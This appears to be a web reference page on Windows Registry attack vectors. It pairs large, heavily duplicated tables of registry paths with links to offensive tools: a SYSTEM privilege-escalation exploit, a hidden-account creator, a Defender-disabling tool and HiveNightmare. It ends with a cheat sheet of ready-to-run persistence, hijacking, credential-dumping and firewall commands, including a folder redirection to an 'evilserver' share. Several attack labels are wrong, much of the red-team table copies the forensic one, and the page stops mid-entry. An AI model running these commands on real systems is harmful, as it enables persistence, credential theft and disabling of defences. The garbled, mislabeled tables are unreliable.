Registry Attack Vectors

Registry Attack Vectors

The Windows Registry is a centralized configuration system that stores information necessary to configure the system for one or more users, applications, and hardware devices. The data is stored in a tree structure with nodes, and each node is called a "key." Each key can contain both subkeys and data entries (or values).

Structure of the Registry

Structure of the Registry

The Windows Registry is divided into several different sections, or "hives." Some of the primary hives include:

  • HKEY_CLASSES_ROOT (HKCR): Contains information about registered applications, such as file associations and OLE Object Class IDs.

  • HKEY_CURRENT_USER (HKCU): Contains settings for the currently logged-in user.

  • HKEY_LOCAL_MACHINE (HKLM): Contains system-related information about the local machine, such as hardware configurations and software settings.

  • HKEY_USERS (HKU): Contains settings for all users on the system.

  • HKEY_CURRENT_CONFIG: Contains information about the current hardware profile.

Important Registry Paths for Forensic Analysis

No.Registry PathDescription
1HKLM\SYSTEM\CurrentControlSet\Control\ComputerNameComputer name
2HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallInstalled software
3HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents
4HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRURecently opened/saved files
5HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRURun history
6HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ParametersNetwork configuration
7HKCU\Software\Microsoft\Internet Explorer\TypedURLsTyped URLs in Internet Explorer
8HKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsInternet settings
9HKLM\SYSTEM\CurrentControlSet\Services\bam\UserSettingsRecently executed programs
10HKCU\Software\Microsoft\OfficeMicrosoft Office usage
11HKLM\SYSTEM\CurrentControlSet\Enum\USBUSB device history
12HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2Mounted devices
13HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonWinlogon settings
14HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformationTime zone information
15HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssistUserAssist data
16HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileListUser profile paths
17HKCU\Control Panel\DesktopDesktop settings
18HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersUser-specific folders
19HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group PolicyGroup policy settings
20HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory ManagementMemory management settings
21HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsWindows folder paths
22HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerUser-specific policies
23HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\ProfilesNetwork profiles
24HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExtsFile extension actions
25HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32System drivers
26HKCU\Software\Microsoft\Search Assistant\ACMruSearch Assistant history
27HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebugDebugger settings
28HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegeditLast key viewed in Regedit
29HKLM\SYSTEM\CurrentControlSet\Control\SafeBootSafe boot options
30HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRUFolder settings
31HKCU\Software\Microsoft\Terminal Server ClientRemote desktop connections
32HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerflibPerformance library
33HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedExplorer advanced settings
34HKLM\SYSTEM\CurrentControlSet\Control\Print\PrintersConfigured printers
35HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging SubsystemMessaging settings
36HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIconsHidden desktop icons
37HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotfixInstalled hotfixes
38HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WallpapersWallpaper history
39HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EMDMgmtExternal device management
40HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ReliabilitySystem reliability data
41HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffectsVisual effects settings
42HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\VirtualizationVirtualization settings
43HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSIDExplorer CLSID data
44HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsUpdateWindows Update settings
45HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotifyTray notifications
46HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WOWWindows on Windows settings
47HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPageStart page settings
48HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPEWindows Preinstallation Environment
49HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TaskbandTaskbar settings
50HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileGuidUser profile GUIDs
51HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell ExtensionsShell extensions
52HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfoSession information
53HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevicesMultimedia devices
54HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\DiscardableDiscardable post-setup data
55HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUILogon UI settings
56HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2Start page settings (alternate)
57HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMANWindows Remote Management
58HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrderMenu order settings
59HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallUninstalled software
60HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRUStream MRU
61HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsBrowser Helper Objects (BHOs)
62HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskSchedulerShared task scheduler
63HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooksShell execute hooks
64HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellStateShell state
65HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiersShell icon overlay identifiers
66HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents (alternate)
67HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NamespaceMy Computer namespace
68HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanelHidden desktop icons in new start panel
69HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIconsDrive icons
70HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRULast visited MRU
71HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucketRecycle bin settings
72HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedAdvanced explorer settings
73HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskSchedulerShared task scheduler (alternate)
74HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersShell folders
75HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersSystem shell folders
76HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents (alternate)
77HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsSystem recent documents
78HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NamespaceUser-specific My Computer namespace
79HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenuHidden desktop icons in classic start menu
80HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenuUser-specific hidden desktop icons in classic start menu
81HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NamespaceControl Panel namespace
82HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NamespaceUser-specific Control Panel namespace
83HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanelControl Panel settings
84HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSIDCLSID data
85HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSIDSystem CLSID data
86HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedAdvanced explorer settings (alternate)
87HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedSystem advanced explorer settings
88HKCU\Software\Microsoft\Windows\CurrentVersion\ExplorerUser-specific explorer settings
89HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerSystem explorer settings
90HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesInternet security zones
91HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSystem internet security zones
92HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapInternet zone map
93HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapSystem internet zone map
94HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\DomainsInternet zone map domains
95HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\DomainsSystem internet zone map domains
96HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\RangesInternet zone map ranges
97HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\RangesSystem internet zone map ranges
98HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaultsInternet protocol defaults
99HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaultsSystem internet protocol defaults
100HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsInternet connections settings

Important Registry Paths for Offensive Security and Red Teaming

No.Registry PathDescription
1HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunPrograms that run on system startup
2HKCU\Software\Microsoft\Windows\CurrentVersion\RunPrograms that run on user login
3HKLM\SYSTEM\CurrentControlSet\ServicesSystem services
4HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonWinlogon process customization
5HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunUser-specific startup programs
6HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystem-wide startup programs
7HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution OptionsDebugger settings for executables
8HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoadDelayed loading of shell extensions
9HKCU\Software\Microsoft\Office\<version>\Outlook\SecurityOutlook security settings
10HKLM\SYSTEM\CurrentControlSet\Control\LsaLocal Security Authority settings
11HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallInstalled software
12HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2Mounted devices
13HKLM\SYSTEM\CurrentControlSet\Control\SafeBootSafe boot options
14HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRUFolder settings
15HKCU\Software\Microsoft\Terminal Server ClientRemote desktop connections
16HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerflibPerformance library
17HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32System drivers
18HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebugDebugger settings
19HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegeditLast key viewed in Regedit
20HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsBrowser Helper Objects (BHOs)
21HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooksShell execute hooks
22HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiersShell icon overlay identifiers
23HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NamespaceMy Computer namespace
24HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIconsDrive icons
25HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucketRecycle bin settings
26HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskSchedulerShared task scheduler
27HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersSystem shell folders
28HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsSystem recent documents
29HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenuHidden desktop icons in classic start menu
30HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NamespaceControl Panel namespace
31HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanelControl Panel settings
32HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSIDSystem CLSID data
33HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedSystem advanced explorer settings
34HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerSystem explorer settings
35HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSystem internet security zones
36HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapSystem internet zone map
37HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\DomainsSystem internet zone map domains
38HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\RangesSystem internet zone map ranges
39HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaultsSystem internet protocol defaults
40HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsInternet connections settings
41HKLM\SYSTEM\CurrentControlSet\Control\ComputerNameComputer name
42HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRURecently opened/saved files
43HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRURun history
44HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ParametersNetwork configuration
45HKCU\Software\Microsoft\Internet Explorer\TypedURLsTyped URLs in Internet Explorer
46HKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsInternet settings
47HKLM\SYSTEM\CurrentControlSet\Services\bam\UserSettingsRecently executed programs
48HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents
49HKLM\SYSTEM\CurrentControlSet\Enum\USBUSB device history
50HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileListUser profile paths
51HKCU\Control Panel\DesktopDesktop settings
52HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersUser-specific folders
53HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group PolicyGroup policy settings
54HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory ManagementMemory management settings
55HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsWindows folder paths
56HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerUser-specific policies
57HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\ProfilesNetwork profiles
58HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExtsFile extension actions
59HKCU\Software\Microsoft\Search Assistant\ACMruSearch Assistant history
60HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellStateShell state
61HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents (alternate)
62HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanelHidden desktop icons in new start panel
63HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRULast visited MRU
64HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedAdvanced explorer settings
65HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersShell folders
66HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents (alternate)
67HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NamespaceUser-specific My Computer namespace
68HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenuUser-specific hidden desktop icons in classic start menu
69HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NamespaceUser-specific Control Panel namespace
70HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSIDCLSID data
71HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedAdvanced explorer settings (alternate)
72HKCU\Software\Microsoft\Windows\CurrentVersion\ExplorerUser-specific explorer settings
73HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesInternet security zones
74HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapInternet zone map
75HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\DomainsInternet zone map domains
76HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\RangesInternet zone map ranges
77HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaultsInternet protocol defaults
78HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell ExtensionsShell extensions
79HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfoSession information
80HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevicesMultimedia devices
81HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\DiscardableDiscardable post-setup data
82HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUILogon UI settings
83HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2Start page settings (alternate)
84HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMANWindows Remote Management
85HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrderMenu order settings
86HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRUStream MRU
87HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskSchedulerShared task scheduler
88HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellStateShell state
89HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents (alternate)
90HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanelHidden desktop icons in new start panel
91HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRULast visited MRU
92HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedAdvanced explorer settings
93HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersShell folders
94HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecent documents (alternate)
95HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NamespaceUser-specific My Computer namespace
96HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenuUser-specific hidden desktop icons in classic start menu
97HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NamespaceUser-specific Control Panel namespace
98HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSIDCLSID data
99HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedAdvanced explorer settings (alternate)
100HKCU\Software\Microsoft\Windows\CurrentVersion\ExplorerUser-specific explorer settings

Perfusion

On Windows 7, Windows Server 2008R2, Windows 8, and Windows Server 2012, the registry key of the RpcEptMapper and DnsCache (7/2008R2 only) services is configured with weak permissions. Any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name).

Perfusion.exe -c cmd -i

github.com/itm4n/Perfusion

CreateHiddenAccount

A tool for creating hidden accounts using the registry

CreateHiddenAccount.exe -u teamssix -p Passw0rd

github.com/wgpsec/CreateHiddenAccount

WinDefenderKiller

# x86_64-w64-mingw32-g++ -O2 disableWinDef.cpp -o winDefKiller -I/usr/share/mingw-w64/include -L/usr/lib -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -Wnarrowing -fexceptions

github.com/S12cybersecurity/WinDefenderKiller

usbdeviceforensics

usbdeviceforensics is a python script to extract numerous bits of information regarding USB devices. It initially used the information from a SANS blog (Rob Lee) post to retrieve operating system specific information. It now has the ability to process multiple NTUSER.dat registry hives in one go.

python setup.py build

github.com/woanware/usbdeviceforensics

hivex

a library for reading and writing Windows Registry "hive" files

autoreconf -i
./generator/generator.ml
./configure
make
make check

github.com/libguestfs/hivex

Autopsy-Registry-Explorer

Autopsy Module to analyze Registry Hives

github.com/0xHasanM/Autopsy-Registry-Explorer

RegistryExtraction

A python script that will extract the SAM, SYSTEM, and SECURITY registry hive files to C:\ for easy extraction.

https://registryextract.py/

github.com/BeetleChunks/RegistryExtraction

HiveNightmare

Exploit allowing you to read registry hives as non-admin on Windows 10 and 11

HiveNightmare.exe 200

github.com/GossiTheDog/HiveNightmare

windows_hardening

HardeningKitty and Windows Hardening settings and configurations

Import-Module .\HardeningKitty.psm1
Invoke-HardeningKitty -EmojiSupport

github.com/0x6d69636b/windows_hardening

Persistence via Startup Programs

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Attacks: System Persistence, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MalwareName /t REG_SZ /d "malwarepath.exe"

User-Level Persistence

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Attacks: User Persistence, Malware Execution
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MalwareName /t REG_SZ /d "malwarepath.exe"

Manipulating System Services

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services
Attacks: Privilege Escalation, Service Manipulation
Codes:sc create EvilService binPath= "evil.exe"

Credential Theft at Login

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Attacks: Credential Theft, Persistence
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "evil.exe"

User-Level Persistence via Policies

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Attacks: User Persistence, Malware Execution
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v MalwareName /t REG_SZ /d "malwarepath.exe"

System-Level Persistence via Policies

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Attacks: System Persistence, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v MalwareName /t REG_SZ /d "malwarepath.exe"

Binary Hijacking

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Attacks: Binary Hijacking, Debugger Redirection
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe /v Debugger /t REG_SZ /d "evilcalc.exe"

DLL Loading via Shell Extensions

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
Attacks: Persistence, DLL Loading
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad /v EvilDLL /t REG_SZ /d "evildllpath.dll"

Bypassing Outlook Security

Registry Path:HKCU\Software\Microsoft\Office\<version>\Outlook\Security
Attacks: Phishing, Malicious Attachment Execution
Codes:reg add HKCU\Software\Microsoft\Office\<version>\Outlook\Security /v Level1Remove /t REG_SZ /d ".exe"

Credential Dumping via LSA

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Attacks: Credential Theft, LSA Secrets Dumping
Codes:mimikatz "lsadump::lsa /patch"

User Activity via Typed URLs

Registry Path:HKCU\Software\Microsoft\Internet Explorer\TypedURLs
Attacks: Gathering Browsing History
Codes:reg query HKCU\Software\Microsoft\Internet Explorer\TypedURLs

User-Level Persistence via Explorer Policies

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Attacks: User Persistence, Restricting Access
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1

Network Profiles Access

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles
Attacks: Gathering Network Information
Codes:reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles

File Extension Actions Manipulation

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt /v Progid /t REG_SZ /d "evilprogid"

Search Assistant History Access

Registry Path:HKCU\Software\Microsoft\Search Assistant\ACMru
Attacks: Gathering Search Queries
Codes:reg query HKCU\Software\Microsoft\Search Assistant\ACMru

USB Device History Access

Registry Path:HKLM\SYSTEM\CurrentControlSet\Enum\USB
Attacks: Gathering USB Connection History
Codes:reg query HKLM\SYSTEM\CurrentControlSet\Enum\USB

User Profile Paths Access

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Attacks: Gathering User Profile Information
Codes:reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

Desktop Settings Manipulation

Registry Path:HKCU\Control Panel\Desktop
Attacks: User Experience Manipulation, Screen Lock Bypass
Codes:reg add HKCU\Control Panel\Desktop /v ScreenSaveTimeOut /t REG_SZ /d "0"

User-Specific Folder Redirection

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Attacks: Data Theft, Folder Redirection
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Personal /t REG_SZ /d "\\evilserver\stolen_data"

Group Policy Settings Manipulation

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Attacks: Policy Manipulation, System Behavior Alteration
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy /v DisableCMD /t REG_DWORD /d 0

Memory Management Manipulation

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
Attacks: System Performance Degradation
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management /v ClearPageFileAtShutdown /t REG_DWORD /d 1

Windows Folder Path Manipulation

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Attacks: System Behavior Alteration, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows /v AppInit_DLLs /t REG_SZ /d "evil.dll"

User-Specific Policies Manipulation

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Attacks: User Experience Manipulation, Restricting Access
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1

Network Configuration Access

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Attacks: Gathering Network Configuration
Codes:reg query HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

Recently Executed Programs Access

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\bam\UserSettings
Attacks: Gathering User Activity
Codes:reg query HKLM\SYSTEM\CurrentControlSet\Services\bam\UserSettings

Recent Documents Access

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Attacks: Gathering Recently Accessed Documents
Codes:reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

Internet Connections Settings Manipulation

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Attacks: Man-in-the-Middle, Proxy Redirection
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections /v DefaultConnectionSettings /t REG_BINARY /d [modified_hex_values]

Computer Name Access

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\ComputerName
Attacks: Gathering System Information
Codes:reg query HKLM\SYSTEM\CurrentControlSet\Control\ComputerName

Firewall Settings Manipulation

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall add rule name="EvilRule" dir=in action=allow program="evil.exe"

Time Zone Manipulation

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation
Attacks: Timestamp Manipulation, Evidence Tampering
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v TimeZoneKeyName /t REG_SZ /d "EvilTimeZone"

Driver Loading

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\DriverDatabase
Attacks: Kernel-Level Persistence, Privilege Escalation
